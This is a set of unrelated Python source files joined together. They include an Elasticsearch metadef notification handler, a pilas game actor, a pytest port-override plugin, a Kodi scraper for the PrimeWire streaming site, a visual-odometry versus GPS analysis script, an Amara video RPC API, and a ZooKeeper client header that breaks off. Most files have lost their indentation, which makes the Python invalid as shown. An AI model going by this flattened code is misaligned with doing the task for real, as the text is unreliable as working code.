"metadef_property.update": self.update_prop,
"metadef_property.delete": self.delete_prop,
"metadef_resource_type.create": self.create_rs,
"metadef_resource_type.delete": self.delete_rs,
"metadef_tag.create": self.create_tag,
"metadef_tag.update": self.update_tag,
"metadef_tag.delete": self.delete_tag,
"metadef_namespace.delete_properties": self.delete_props,
"metadef_namespace.delete_objects": self.delete_objects,
"metadef_namespace.delete_tags": self.delete_tags
}
actions[event_type](payload)
return oslo_messaging.NotificationResult.HANDLED
except Exception as e:
LOG.error(utils.exception_to_str(e))
def run_create(self, id, payload):
self.engine.create(
index=self.index_name,
doc_type=self.document_type,
body=payload,
id=id
)
def run_update(self, id, payload, script=False):
if script:
self.engine.update(
index=self.index_name,
doc_type=self.document_type,
body=payload,
id=id)
else:
doc = {"doc": payload}
self.engine.update(
index=self.index_name,
doc_type=self.document_type,
body=doc,
id=id)
def run_delete(self, id):
self.engine.delete(
index=self.index_name,
doc_type=self.document_type,
id=id
)
def create_ns(self, payload):
id = payload['namespace']
self.run_create(id, self.format_namespace(payload))
def update_ns(self, payload):
id = payload['namespace_old']
self.run_update(id, self.format_namespace(payload))
def delete_ns(self, payload):
id = payload['namespace']
self.run_delete(id)
def create_obj(self, payload):
id = payload['namespace']
object = self.format_object(payload)
self.create_entity(id, "objects", object)
def update_obj(self, payload):
id = payload['namespace']
object = self.format_object(payload)
self.update_entity(id, "objects", object,
payload['name_old'], "name")
def delete_obj(self, payload):
id = payload['namespace']
self.delete_entity(id, "objects", payload['name'], "name")
def create_prop(self, payload):
id = payload['namespace']
property = self.format_property(payload)
self.create_entity(id, "properties", property)
def update_prop(self, payload):
id = payload['namespace']
property = self.format_property(payload)
self.update_entity(id, "properties", property,
payload['name_old'], "property")
def delete_prop(self, payload):
id = payload['namespace']
self.delete_entity(id, "properties", payload['name'], "property")
def create_rs(self, payload):
id = payload['namespace']
resource_type = dict()
resource_type['name'] = payload['name']
if payload['prefix']:
resource_type['prefix'] = payload['prefix']
if payload['properties_target']:
resource_type['properties_target'] = payload['properties_target']
self.create_entity(id, "resource_types", resource_type)
def delete_rs(self, payload):
id = payload['namespace']
self.delete_entity(id, "resource_types", payload['name'], "name")
def create_tag(self, payload):
id = payload['namespace']
tag = dict()
tag['name'] = payload['name']
self.create_entity(id, "tags", tag)
def update_tag(self, payload):
id = payload['namespace']
tag = dict()
tag['name'] = payload['name']
self.update_entity(id, "tags", tag, payload['name_old'], "name")
def delete_tag(self, payload):
id = payload['namespace']
self.delete_entity(id, "tags", payload['name'], "name")
def delete_props(self, payload):
self.delete_field(payload, "properties")
def delete_objects(self, payload):
self.delete_field(payload, "objects")
def delete_tags(self, payload):
self.delete_field(payload, "tags")
def create_entity(self, id, entity, entity_data):
script = ("if (ctx._source.containsKey('%(entity)s'))"
"{ctx._source.%(entity)s += entity_item }"
"else {ctx._source.%(entity)s=entity_list};" %
{"entity": entity})
params = {
"entity_item": entity_data,
"entity_list": [entity_data]
}
payload = {"script": script, "params": params}
self.run_update(id, payload=payload, script=True)
def update_entity(self, id, entity, entity_data, entity_id, field_name):
entity_id = entity_id.lower()
script = ("obj=null; for(entity_item :ctx._source.%(entity)s)"
"{if(entity_item['%(field_name)s'].toLowerCase() "
" == entity_id ) obj=entity_item;};"
"if(obj!=null)ctx._source.%(entity)s.remove(obj);"
"if (ctx._source.containsKey('%(entity)s'))"
"{ctx._source.%(entity)s += entity_item; }"
"else {ctx._source.%(entity)s=entity_list;}" %
{"entity": entity, "field_name": field_name})
params = {
"entity_item": entity_data,
"entity_list": [entity_data],
"entity_id": entity_id
}
payload = {"script": script, "params": params}
self.run_update(id, payload=payload, script=True)
def delete_entity(self, id, entity, entity_id, field_name):
entity_id = entity_id.lower()
script = ("obj=null; for(entity_item :ctx._source.%(entity)s)"
"{if(entity_item['%(field_name)s'].toLowerCase() "
" == entity_id ) obj=entity_item;};"
"if(obj!=null)ctx._source.%(entity)s.remove(obj);" %
{"entity": entity, "field_name": field_name})
params = {
"entity_id": entity_id
}
payload = {"script": script, "params": params}
self.run_update(id, payload=payload, script=True)
def delete_field(self, payload, field):
id = payload['namespace']
script = ("if (ctx._source.containsKey('%(field)s'))"
"{ctx._source.remove('%(field)s')}") % {"field": field}
payload = {"script": script}
self.run_update(id, payload=payload, script=True)
def format_namespace(self, payload):
for key in self.namespace_delete_keys:
if key in payload.keys():
del payload[key]
return payload
def format_object(self, payload):
formatted_object = dict()
formatted_object['name'] = payload['name']
formatted_object['description'] = payload['description']
if payload['required']:
formatted_object['required'] = payload['required']
formatted_object['properties'] = []
for property in payload['properties']:
formatted_property = self.format_property(property)
formatted_object['properties'].append(formatted_property)
return formatted_object
def format_property(self, payload):
prop_data = dict()
prop_data['property'] = payload['name']
for key, value in six.iteritems(payload):
if key not in self.property_delete_keys and value:
prop_data[key] = value
return prop_data
|
# -*- encoding: utf-8 -*-
# pilas engine: un motor para hacer videojuegos
#
# Copyright 2010-2014 - Hugo Ruscitti
# License: LGPLv3 (see http://www.gnu.org/licenses/lgpl.html)
#
# Website - http://www.pilas-engine.com.ar
from pilasengine.actores.actor import Actor
class Piedra(Actor):
"""Representa una piedra que podría ser usada como meteoríto."""
def iniciar(self):
self.definir_tamano('grande')
self.velocidad_rotacion = 1
self.dx = 0
self.dy = 0
def definir_tamano(self, tamano):
        if tamano not in ['grande', 'media', 'chica']:
            raise Exception("El tamano indicado es incorrecto, solo se permite "
                            "'grande', 'media' o 'chica'.")
self.imagen = self.pilas.imagenes.cargar('piedra_' + tamano + '.png')
radios = {'grande': 25, 'media': 20, 'chica': 10}
self.radio_de_colision = radios[tamano]
self.aprender(self.pilas.habilidades.SeMantieneEnPantalla)
def actualizar(self):
"Realiza una actualización de la posición."
self.rotacion += self.velocidad_rotacion
self.x += self.dx
self.y += self.dy
def empujar(self, dx, dy):
self.dx = dx
self.dy = dy
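# Usage sketch (assumes a running pilas instance created with pilasengine.iniciar();
# names follow the actor API above):
#
#     piedra = pilas.actores.Piedra()
#     piedra.definir_tamano('media')
#     piedra.empujar(1, -0.5)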
|
# -*- coding: utf-8 -*-
import pytest
from cfme.utils import ports
from cfme.utils.log import logger
def pytest_addoption(parser):
group = parser.getgroup('Port override')
group.addoption('--port-db',
action='store',
default=None,
dest='port_db',
help="Override appliance's database port.")
group.addoption('--port-ssh',
action='store',
default=None,
dest='port_ssh',
help="Override appliance's SSH port.")
@pytest.mark.tryfirst
def pytest_configure(config):
if config.getoption('--help'):
return
# SSH
port_ssh = config.getoption("port_ssh")
if port_ssh is not None:
logger.info("Overriding SSH port to {}.".format(str(port_ssh)))
ports.SSH = int(port_ssh)
# DB
port_db = config.getoption("port_db")
if port_db is not None:
logger.info("Overriding DB port to {}.".format(str(port_db)))
ports.DB = int(port_db)
|
import os
import re
import sys
import urllib
import urllib2
import HTMLParser
from t0mm0.common.net import Net
from t0mm0.common.addon import Addon
addon = Addon('plugin.video.1channel', sys.argv)
BASE_URL = addon.get_setting('domain')
if ((addon.get_setting("enableDomain"))=='true') and (len(addon.get_setting("customDomain")) > 10):
BASE_URL=addon.get_setting("customDomain")
display_name = 'PrimeWire'
required_addons = []
tag = 'PWr'
def get_settings_xml():
return False
def get_results(vid_type, title, year, imdb, tvdb, season, episode):
if vid_type == 'movie':
return Search('movies', title, imdb)
elif vid_type == 'tvshow':
return _get_tvshows(title, year, imdb, tvdb)
elif vid_type == 'season':
return _get_season(title, year, imdb, tvdb, season)
elif vid_type == 'episode':
return _get_episodes(title, year, imdb, tvdb, season, episode)
def GetURL(url):
try: addon.log('Fetching URL: %s' % url)
except: pass
USER_AGENT = 'User-Agent:Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.56'
req = urllib2.Request(url)
req.add_header('User-Agent', USER_AGENT)
host = re.sub('http://', '', BASE_URL)
req.add_header('Host', host)
req.add_header('Referer', BASE_URL)
try:
response = urllib2.urlopen(req, timeout=10)
body = response.read()
body = unicode(body, 'iso-8859-1')
h = HTMLParser.HTMLParser()
body = h.unescape(body)
except Exception, e:
try: addon.log('Failed to connect to %s: %s' % (url, e))
except: pass
return ''
return body.encode('utf-8')
def Search(section, query, imdb):
html = GetURL(BASE_URL)
r = re.search('input type="hidden" name="key" value="([0-9a-f]*)"', html).group(1)
search_url = BASE_URL + '/index.php?search_keywords='
search_url += urllib.quote_plus(query)
search_url += '&key=' + r
if section == 'tv':
search_url += '&search_section=2'
video_type = 'tvshow'
else:
video_type = 'movie'
html = GetURL(search_url)
r = 'class="index_item.+?href="(.+?)" title="Watch (.+?)"?\(?([0-9]{4})?\)?"?>.+?src="(.+?)"'
regex = re.search(r, html, re.DOTALL)
if regex:
url, title, year, thumb = regex.groups()
net = Net()
cookiejar = addon.get_profile()
cookiejar = os.path.join(cookiejar, 'cookies')
net.set_cookies(cookiejar)
html = net.http_GET(BASE_URL + url).content
net.save_cookies(cookiejar)
adultregex = '<div class="offensive_material">.+<a href="(.+)">I understand'
r = re.search(adultregex, html, re.DOTALL)
if r:
try: addon.log('Adult content url detected')
except: pass
adulturl = BASE_URL + r.group(1)
headers = {'Referer': url}
net.set_cookies(cookiejar)
html = net.http_GET(adulturl, headers=headers).content
net.save_cookies(cookiejar)
for version in re.finditer('<table[^\n]+?class="movie_version(?: movie_version_alt)?">(.*?)</table>',
html, re.DOTALL | re.IGNORECASE):
for s in re.finditer('quality_(?!sponsored|unknown)(.*?)></span>.*?' +
'url=(.*?)&(?:amp;)?domain=(.*?)&(?:amp;)?(.*?)' +
'"version_veiws"> ([\d]+) views</',
version.group(1), re.DOTALL):
q, url, host, parts, views = s.groups()
q = q.upper()
url = url.decode('base-64')
host = host.decode('base-64')
disp_title = '[%s] %s (%s views)' % (q, host, views)
result = {'tag': tag, 'provider_name': display_name}
qs = {'url': url, 'title': title, 'img': thumb, 'year': year, 'imdbnum': imdb, 'video_type': video_type, 'strm': True, 'mode': 'PlaySource'}
result['li_url'] = 'plugin://plugin.video.1channel/?%s' % urllib.urlencode(qs)
print result['li_url']
result['info_labels'] = {'title': disp_title}
yield result
|
#!/usr/bin/python
import os
import math
import re
import struct
import numpy as np
import matplotlib.pyplot as plt
def readstamp(f):
pgmoffset=17
bs=f.read(pgmoffset+4)
x=struct.unpack("<I",bs[pgmoffset:pgmoffset+4])[0]
w = (x>>20) & 0x0fff
n = (x>>16) & 0x000f
t = (x>>0) & 0xffff
return w,n,t
def getTime(gps_pt):
return gps_pt[9]*60 + gps_pt[10]
gps_pts = np.array(np.loadtxt('gps_route.txt'))
vo_pts = np.array(np.loadtxt('viso_points_bb.txt'))
vo_pts_kitti = np.array(np.loadtxt('viso_points_kitti_00.txt'))
plt.figure(figsize=(12,8))
#plt.plot(range(1,len(vo_inter)-1), gps_phis, marker='o', color='r', label="GPS rotation angles")
plt.plot(vo_pts[:,7])
plt.figure(figsize=(12,8))
plt.plot(vo_pts_kitti[:,7])
plt.figure(figsize=(12,8))
plt.plot(gps_pts[:,2])
plt.show()
exit(1)
src_folder = '/home/kreso/projects/master_thesis/datasets/bumblebee/20121031_cycle/'
t_prev=-1
deltas=[]
for name in sorted(os.listdir(src_folder)):
m=re.match(r'fc2.*pgm', name)
if m:
w,n,t=readstamp(open(src_folder+name, mode='rb'))
delta=t-t_prev if t_prev>=0 else 0
if delta<0:
delta+=65536
# print('{} {:01x} {:04x} {}'.format(name, n,t, delta))
t_prev=t
deltas.append(delta)
# cycle_time = num of secs / num of cycles
cycle_time = 111 / sum(deltas)
print("Sum of deltas: ", sum(deltas))
print("Cycle time: ", cycle_time)
# convert delta stamps to delta time
deltas=[x*cycle_time for x in deltas[1:]]
# set odometry start time (0 is start time of first gps point)
vo_start = 3.0 # 2.8 3.3 3.0
vo_times = [vo_start]
# get precise time from timestamps in each frame
for i in range(len(deltas)):
vo_times.append(deltas[i] + vo_times[i])
# only every 3rd frame was used for the odometry, so subsample the times
print("Number of frames: ", len(vo_times))
vo_times=vo_times[::3]
vo_pts=vo_pts[::]
print("Number of frames after sampling: ", len(vo_times))
#vo_pts2D=np.ndarray((vo_pts.shape[0], 2))
vo_pts2D=np.zeros((vo_pts.shape[0], 2))
for i in range(len(vo_pts)):
vo_pts2D[i,0]=vo_pts[i,3]
vo_pts2D[i,1]=vo_pts[i,11]
# the time of the first GPS point must be greater than the visual odometry start time,
# otherwise we don't have data to interpolate it
# print(len(gps_pts), gps_pts.shape, len(vo_pts))
t0 = getTime(gps_pts[0])
for i in range(len(gps_pts)):
    # cut at the first GPS point with a larger time and break
if getTime(gps_pts[i])-t0 > vo_times[0]:
gps_pts=gps_pts[i:]
break
# interpolate the visual odometry at the times
# of the GPS points
vo_inter = np.zeros((gps_pts.shape[0], 2))
for i in range(len(gps_pts)):
pt = gps_pts[i]
t = getTime(pt) - t0
#print(t)
for j in range(len(vo_pts2D)):
if vo_times[j] >= t:
if i == 0:
vo_pts_crop = vo_pts2D[j-1:,:]
assert j>0
# print(" -> ", vo_times[j])
alfa = (t - vo_times[j-1]) / (vo_times[j] - vo_times[j-1])
vo_inter[i] = (1-alfa) * vo_pts2D[j-1] + alfa * vo_pts2D[j]
# print(i, vo_inter[i])
break
else:
vo_inter=vo_inter[:i,:]
gps_pts=gps_pts[:i,:]
break
gps_pts = gps_pts[:,0:2]
#print(gps_pts)
#print(vo_pts2D)
#print(vo_inter)
#plt.plot(vo_pts2D[:,0], vo_pts2D[:,1], marker='.', color='r', label="VO_orig")
#plt.plot(vo_pts_crop[:,0], vo_pts_crop[:,1], marker='.', color='b', label="VO_orig")
#plt.plot(vo_inter[:,0], vo_inter[:,1], marker='.', color='b', label="VO_inter")
#plt.show()
#exit(0)
# angle between 2 vectors defined by 3 points using dot product
def calcphi(pt1,pt2,pt3):
v1=pt2-pt1
v2=pt3-pt2
return math.degrees(math.acos(np.dot(v1,v2)/np.linalg.norm(v1)/np.linalg.norm(v2)))
# angle between 2 vectors using vector product (-90, 90)
def calcphi2vec(v1,v2):
return math.degrees(math.asin((v1[0]*v2[1]-v1[1]*v2[0])/
np.linalg.norm(v1)/np.linalg.norm(v2)))
def calcphi2(pt1,pt2,pt3):
v1=pt2-pt1
v2=pt3-pt2
return calcphi2vec(v1,v2)
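# Quick sanity check of the sign convention (illustrative, not part of the
# original pipeline): a 90-degree left turn yields +90, a right turn -90,
# matching the "<0 (right), >0 (left)" axis label used for the plots below.
assert abs(calcphi2(np.array([0., 0.]), np.array([1., 0.]), np.array([1., 1.])) - 90.0) < 1e-6
assert abs(calcphi2(np.array([0., 0.]), np.array([1., 0.]), np.array([1., -1.])) + 90.0) < 1e-6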
# angular movement data
gps_phis=np.array([calcphi2(gps_pts[i-1],gps_pts[i],gps_pts[i+1]) for i in range(1,len(vo_inter)-1)])
vo_phis=np.array([calcphi2(vo_inter[i-1],vo_inter[i],vo_inter[i+1]) for i in range(1,len(vo_inter)-1)])
# angular movement difference between gps and visual odometry
# can't do this until the vo and gps paths are aligned by starting point and rotation offset
#gps_vo_phis=[calcphi2vec(gps_pts[i]-gps_pts[i-1], vo_inter[i]-vo_inter[i-1]) for i in range(1,len(vo_inter))]
# speed movement data
gps_speed=np.array([np.linalg.norm(gps_pts[i]-gps_pts[i-1]) for i in range(1,len(vo_inter))])
vo_speed=np.array([np.linalg.norm(vo_inter[i]-vo_inter[i-1]) for i in range(1,len(vo_inter))])
#print (gps_phis[0:10])
#print (vo_phis[0:10])
#print([gps_pts[i] for i in range(0,10)])
#print([vo_inter[i] for i in range(0,10)])
#print([vo_inter[i]-vo_inter[i-1] for i in range(1,10)])
#print(calcphi(vo_inter[2-2],vo_inter[2-1],vo_inter[2]))
#plt.plot(gps_pts[:10,0], gps_pts[:10,1], marker='o', color='r')
#plt.plot(vo_inter[:10,0], vo_inter[:10,1], marker='o', color='b')
trans_mse = np.mean(np.square(gps_speed - vo_speed))
trans_mae = np.mean(np.abs(gps_speed - vo_speed))
print("translation error MSE: ", trans_mse)
print("translation error MAE: ", trans_mae)
fig_speed = plt.figure(figsize=(12,8))
plt.plot(range(1,len(vo_inter)), gps_speed, marker='o', color='r', label="GPS")
plt.plot(range(1,len(vo_inter)), vo_speed, marker='o', color='b', label="visual odometry")
plt.title("MSE = " + str(trans_mse)[:5] + ", MAE = " + str(trans_mae)[:5], fontsize=20)
#plt.title('Speed', fontsize=14)
plt.xlabel('time (s)', fontsize=14)
plt.ylabel('distance (m)', fontsize=14)
plt.legend()
# plot scale error of visual odometry
fig_scale = plt.figure(figsize=(12,8))
scale_err = np.array(gps_speed) / np.array(vo_speed)
plt.plot(scale_err, marker='o', color='r')
plt.plot([0,120], [1.0,1.0], ls="--", color="k")
#fig_scale.suptitle('Scale error', fontsize=18)
plt.xlabel('time (s)', fontsize=14)
plt.ylabel('scale error (gps / odometry)', fontsize=14)
#print(gps_phis)
#print(vo_phis)
#print(np.square(gps_phis - vo_phis))
#print((gps_phis - vo_phis))
#print(np.square(gps_phis - vo_phis))
rot_mse = np.mean(np.square(gps_phis - vo_phis))
rot_mae = np.mean(np.abs(gps_phis - vo_phis))
print("rotation error MSE: ", rot_mse)
print("rotation error MAE: ", rot_mae)
fig_rot = plt.figure(figsize=(12,8))
plt.plot(range(1,len(vo_inter)-1), gps_phis, marker='o', color='r', label="GPS rotation angles")
plt.plot(range(1,len(vo_inter)-1), vo_phis, marker='o', color='b', label="odometry rotation angles")
#plt.plot(range(1,len(vo_inter)-1), gps_vo_phis[:-1], marker='o', color='b', label="TODO")
plt.xlabel('time (s)', fontsize=14)
plt.ylabel('angle (deg): <0 (right), >0 (left)', fontsize=14)
#plt.text(45, 20, "average error = " + str(rot_avgerr)[:5], color='b', fontsize=16)
plt.title("MSE = " + str(rot_mse)[:5] + ", MAE = " + str(rot_mae)[:5], fontsize=20)
plt.legend()
fig_path = plt.figure(figsize=(8,8))
#plt.axis('equal')
plt.axis([-50, 200, -100, 150], 'equal')
#gps_pts[:,1] += 40.0
# translate gps to (0,0)
gps_pts[:,0] -= gps_pts[0,0]
gps_pts[:,1] -= gps_pts[0,1]
vo_inter[:,0] -= vo_inter[0,0]
vo_inter[:,1] -= vo_inter[0,1]
vo_pts_crop[:,0] -= vo_pts_crop[0,0]
vo_pts_crop[:,1] -= vo_pts_crop[0,1]
angle = -2.0 #-2.02
#angle = -2.1 # alan calib
R_gps = np.array([[np.cos(angle), -np.sin(angle)], [np.sin(angle), np.cos(angle)]])
gps_pts = R_gps.dot(gps_pts.T)
gps_pts = gps_pts.T
print(gps_pts.shape)
print(vo_pts2D.shape)
gps_pts = np.vstack((gps_pts, gps_pts[0,:]))
plt.plot(gps_pts[:,0], gps_pts[:,1], marker='.', color='r', label="GPS")
plt.plot(gps_pts[::5,0], gps_pts[::5,1], marker='.', color='k', ls="")
plt.plot(vo_inter[:,0], vo_inter[:,1], marker='.', color='b', label="visual odometry")
plt.plot(vo_inter[::5,0], vo_inter[::5,1], marker='.', color='k', ls='')
#for i in range(0,len(vo_inter),10):
# plt.text(vo_inter[i,0]+2, vo_inter[i,1]+2, str(i), color='b')
# plt.text(gps_pts[i,0]+2, gps_pts[i,1]+2, str(i), color='r')
plt.xlabel("x (m)", fontsize=14)
plt.ylabel("z (m)", fontsize=14)
plt.legend(loc="upper left")
fig_path.savefig("plot_path_diff.png", bbox_inches='tight', transparent=True, dpi=200)
fig_speed.savefig("plot_speed.png", bbox_inches='tight')
fig_scale.savefig('plot_scale_error.png', bbox_inches='tight')
fig_rot.savefig("plot_rotation_diff.png", bbox_inches='tight')
plt.show()
|
# Amara, universalsubtitles.org
#
# Copyright (C) 2013 Participatory Culture Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see
# http://www.gnu.org/licenses/agpl-3.0.html.
import datetime
from django.conf import settings
from django.core.paginator import Paginator, InvalidPage, EmptyPage
from django.template import RequestContext
from django.template.defaultfilters import slugify
from django.template.loader import render_to_string
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_lazy
from subtitles.models import SubtitleLanguage
from videos.models import Video, Action
from videos.search_indexes import VideoIndex
from videos.tasks import send_change_title_email
from utils.celery_search_index import update_search_index
from utils.multi_query_set import MultiQuerySet
from utils.rpc import Error, Msg, RpcExceptionEvent, add_request_to_kwargs
from utils.translation import get_user_languages_from_request
VIDEOS_ON_PAGE = VideoIndex.IN_ROW*5
class VideosApiClass(object):
authentication_error_msg = ugettext_lazy(u'You should be authenticated.')
popular_videos_sorts = {
'week': 'week_views',
'month': 'month_views',
'year': 'year_views',
'total': 'total_views'
}
def unfeature_video(self, video_id, user):
if not user.has_perm('videos.edit_video'):
            raise RpcExceptionEvent(_(u'You do not have permission'))
try:
c = Video.objects.filter(pk=video_id).update(featured=None)
except (ValueError, TypeError):
raise RpcExceptionEvent(_(u'Incorrect video ID'))
if not c:
raise RpcExceptionEvent(_(u'Video does not exist'))
update_search_index.delay(Video, video_id)
return {}
def feature_video(self, video_id, user):
if not user.has_perm('videos.edit_video'):
            raise RpcExceptionEvent(_(u'You do not have permission'))
try:
c = Video.objects.filter(pk=video_id).update(featured=datetime.datetime.today())
except (ValueError, TypeError, Video.DoesNotExist):
raise RpcExceptionEvent(_(u'Incorrect video ID'))
if not c:
raise RpcExceptionEvent(_(u'Video does not exist'))
update_search_index.delay(Video, video_id)
return {}
@add_request_to_kwargs
def load_video_languages(self, video_id, user, request):
"""
Load langs for search pages. Will take into consideration
the languages the user speaks.
        Ordering is user language, then completeness, then percentage,
        then name of the language.
We're sorting all in memory since those sets should be pretty small
"""
LANGS_COUNT = 7
try:
video = Video.objects.get(pk=video_id)
except Video.DoesNotExist:
video = None
user_langs = get_user_languages_from_request(request)
langs = list(video.newsubtitlelanguage_set.having_nonempty_tip())
first_languages = [] #user languages and original
other_languages = [] #other languages already ordered by subtitle_count
for language in langs:
if language.language_code in user_langs or language.is_primary_audio_language():
first_languages.append(language)
else:
other_languages.append(language)
def _cmp_first_langs(lang1, lang2):
"""
            prefer languages in user_langs, then the original language
"""
in_user_language_cmp = cmp(lang1.language_code in user_langs, lang2.language_code in user_langs)
#one is not in user language
if in_user_language_cmp != 0:
return in_user_language_cmp
if lang1.language_code in user_langs:
#both in user's language, sort alphabetically
return cmp(lang2.get_language_code_display(), lang1.get_language_code_display())
#one should be original
return cmp(lang1.is_original, lang2.is_original)
first_languages.sort(cmp=_cmp_first_langs, reverse=True)
#fill first languages to LANGS_COUNT
if len(first_languages) < LANGS_COUNT:
other_languages = other_languages[:(LANGS_COUNT-len(first_languages))]
other_languages.sort(lambda l1, l2: cmp(l1.get_language_code_display(), l2.get_language_code_display()))
langs = first_languages + other_languages
else:
langs = first_languages[:LANGS_COUNT]
context = {
'video': video,
'languages': langs
}
return {
'content': render_to_string('videos/_video_languages.html', context)
}
@add_request_to_kwargs
def load_featured_page(self, page, request, user):
sqs = VideoIndex.get_featured_videos()
return render_page(page, sqs, request=request)
@add_request_to_kwargs
def load_latest_page(self, page, request, user):
sqs = VideoIndex.public().order_by('-created')
return render_page(page, sqs, request=request)
@add_request_to_kwargs
def load_popular_page(self, page, sort, request, user):
sort_types = {
'today': 'today_views',
'week' : 'week_views',
'month': 'month_views',
'year' : 'year_views',
'total': 'total_views'
}
sort_field = sort_types.get(sort, 'week_views')
sqs = VideoIndex.get_popular_videos('-%s' % sort_field)
return render_page(page, sqs, request=request, display_views=sort)
@add_request_to_kwargs
def load_featured_page_volunteer(self, page, request, user):
rel, rest = self._get_volunteer_sqs(request, user)
rel = rel.filter(featured__gt=datetime.datetime(datetime.MINYEAR, 1, 1)) \
.order_by('-featured')
rest = rest.filter(featured__gt=datetime.datetime(datetime.MINYEAR, 1, 1)) \
.order_by('-featured')
count = rel.count() + rest.count()
mqs = MultiQuerySet(rel, rest)
mqs.set_count(count)
return render_page(page, mqs, request=request)
@add_request_to_kwargs
def load_requested_page_volunteer(self, page, request, user):
user_langs = get_user_languages_from_request(request)
rel, rest = self._get_volunteer_sqs(request, user)
rel = rel.filter(requests_exact__in=user_langs)
rest = rest.filter(requests_exact__in=user_langs)
count = rel.count() + rest.count()
mqs = MultiQuerySet(rel, rest)
mqs.set_count(count)
return render_page(page, mqs, request=request)
@add_request_to_kwargs
def load_latest_page_volunteer(self, page, request, user):
rel, rest = self._get_volunteer_sqs(request, user)
rel = rel.order_by('-created')
rest = rest.order_by('-created')
count = rel.count() + rest.count()
mqs = MultiQuerySet(rel, rest)
mqs.set_count(count)
return render_page(page, mqs, request=request)
@add_request_to_kwargs
def load_popular_page_volunteer(self, page, sort, request, user):
sort_types = {
'today': 'today_views',
'week' : 'week_views',
'month': 'month_views',
'year' : 'year_views',
'total': 'total_views'
}
sort_field = sort_types.get(sort, 'week_views')
rel, rest = self._get_volunteer_sqs(request, user)
rel = rel.order_by('-%s' % sort_field)
rest = rest.order_by('-%s' % sort_field)
count = rel.count() + rest.count()
mqs = MultiQuerySet(rel, rest)
mqs.set_count(count)
return render_page(page, mqs, request=request)
@add_request_to_kwargs
def load_popular_videos(self, sort, request, user):
sort_types = {
'today': 'today_views',
'week': 'week_views',
'month': 'month_views',
'year': 'year_views',
'total': 'total_views'
}
if sort in sort_types:
display_views = sort
sort_field = sort_types[sort]
else:
display_views = 'week'
sort_field = 'week_views'
popular_videos = VideoIndex.get_popular_videos('-%s' % sort_field)[:VideoIndex.IN_ROW]
context = {
'display_views': display_views,
'video_list': popular_videos
}
content = render_to_string('videos/_watch_page.html', context, RequestContext(request))
return {
'content': content
}
@add_request_to_kwargs
def load_popular_videos_volunteer(self, sort, request, user):
sort_types = {
'today': 'today_views',
'week': 'week_views',
'month': 'month_views',
'year': 'year_views',
'total': 'total_views'
}
sort_field = sort_types.get(sort, 'week_views')
rel, rest = self._get_volunteer_sqs(request, user)
rel = rel.order_by('-%s' % sort_field)[:5]
rest = rest.order_by('-%s' % sort_field)[:5]
count = rel.count() + rest.count()
mqs = MultiQuerySet(rel, rest)
mqs.set_count(count)
context = {
'video_list': mqs
}
content = render_to_string('videos/_watch_page.html', context, RequestContext(request))
return {
'content': content
}
def change_title_video(self, video_pk, title, user):
title = title.strip()
if not user.is_authenticated():
return Error(self.authentication_error_msg)
if not title:
return Error(_(u'Title can\'t be empty'))
try:
video = Video.objects.get(pk=video_pk)
if title and not video.title or video.is_html5() or user.is_superuser:
if title != video.title:
old_title = video.title_display()
video.title = title
video.slug = slugify(video.title)
video.save()
update_search_index.delay(Video, video.pk)
Action.change_title_handler(video, user)
send_change_title_email.delay(video.id, user and user.id, old_title.encode('utf8'), video.title.encode('utf8'))
else:
return Error(_(u'Title can\'t be changed for this video'))
except Video.DoesNotExist:
return Error(_(u'Video does not exist'))
        return Msg(_(u'Title was changed successfully'))
def follow(self, video_id, user):
if not user.is_authenticated():
return Error(self.authentication_error_msg)
try:
video = Video.objects.get(pk=video_id)
except Video.DoesNotExist:
return Error(_(u'Video does not exist.'))
video.followers.add(user)
for l in video.newsubtitlelanguage_set.all():
l.followers.add(user)
return Msg(_(u'You are following this video now.'))
def unfollow(self, video_id, user):
if not user.is_authenticated():
return Error(self.authentication_error_msg)
try:
video = Video.objects.get(pk=video_id)
except Video.DoesNotExist:
return Error(_(u'Video does not exist.'))
video.followers.remove(user)
for l in video.newsubtitlelanguage_set.all():
l.followers.remove(user)
        return Msg(_(u'You are no longer following this video.'))
def follow_language(self, language_id, user):
if not user.is_authenticated():
return Error(self.authentication_error_msg)
try:
language = SubtitleLanguage.objects.get(pk=language_id)
except SubtitleLanguage.DoesNotExist:
            return Error(_(u'Subtitles do not exist.'))
        language.followers.add(user)
        return Msg(_(u'You are now following these subtitles.'))
def unfollow_language(self, language_id, user):
if not user.is_authenticated():
return Error(self.authentication_error_msg)
try:
language = SubtitleLanguage.objects.get(pk=language_id)
except SubtitleLanguage.DoesNotExist:
            return Error(_(u'Subtitles do not exist.'))
        language.followers.remove(user)
        return Msg(_(u'You are no longer following these subtitles.'))
def render_page(page, qs, on_page=VIDEOS_ON_PAGE, request=None,
template='videos/_watch_page.html', extra_context={},
display_views='total'):
paginator = Paginator(qs, on_page)
try:
page = int(page)
except ValueError:
page = 1
try:
page_obj = paginator.page(page)
except (EmptyPage, InvalidPage):
page_obj = paginator.page(paginator.num_pages)
context = {
'video_list': page_obj.object_list,
'page': page_obj,
'display_views': display_views
}
context.update(extra_context)
if request:
content = render_to_string(template, context, RequestContext(request))
else:
context['STATIC_URL'] = settings.STATIC_URL
content = render_to_string(template, context)
total = qs.count()
from_value = (page - 1) * on_page + 1
to_value = from_value + on_page - 1
if to_value > total:
to_value = total
return {
'content': content,
'total': total,
'pages': paginator.num_pages,
'from': from_value,
'to': to_value
}
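# Illustrative sketch (not part of the original module) of the from/to
# bookkeeping done at the end of render_page(): with 23 items and 10 per page,
# page 3 covers items 21..23. The helper below is hypothetical.
def _page_bounds(page, on_page, total):
    from_value = (page - 1) * on_page + 1
    to_value = min(from_value + on_page - 1, total)
    return from_value, to_value
if __name__ == '__main__':
    assert _page_bounds(1, 10, 23) == (1, 10)
    assert _page_bounds(3, 10, 23) == (21, 23)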
|
#
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
import re
import sys
import gevent
import kazoo.client
import kazoo.exceptions
import kazoo.handlers.gevent
import kazoo.recipe.election
import logging
import logging.handlers
from cfgm_common import jsonutils as json
import time
import disc_consts
from gevent.coros import BoundedSemaphore
class DiscoveryZkClient(object):
